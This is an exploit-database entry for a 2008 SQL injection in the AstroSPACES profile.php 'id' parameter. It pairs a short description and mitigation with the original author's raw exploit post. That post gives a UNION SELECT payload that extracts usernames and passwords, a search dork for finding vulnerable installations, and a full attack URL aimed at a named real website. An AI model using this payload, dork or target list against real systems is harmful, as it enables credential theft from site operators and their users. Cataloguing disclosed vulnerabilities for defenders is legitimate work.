header-logo
Suggest Exploit
vendor:
AstroSPACES
by:
TurkishWarriorr
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AstroSPACES
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AstroSPACES (profile.php) SQL

A vulnerability in the AstroSPACES profile.php script allows an attacker to inject arbitrary SQL commands. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter in the 'profile.php' script.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# AstroSPACES (profile.php) SQL

  Powered by Philippine Website Developers and AstroSPACES © P3NET 2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr  (Sehitler Ölmez Vatan Bölünmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :

profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


test sites:

http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--


E mail login :

http://quirino.com.ph/friendster/space.php?action=memberlist

##########################################################################
                               www.1923turk.org                    
                        turkish-warriorr@hotmail.com

# milw0rm.com [2008-10-15]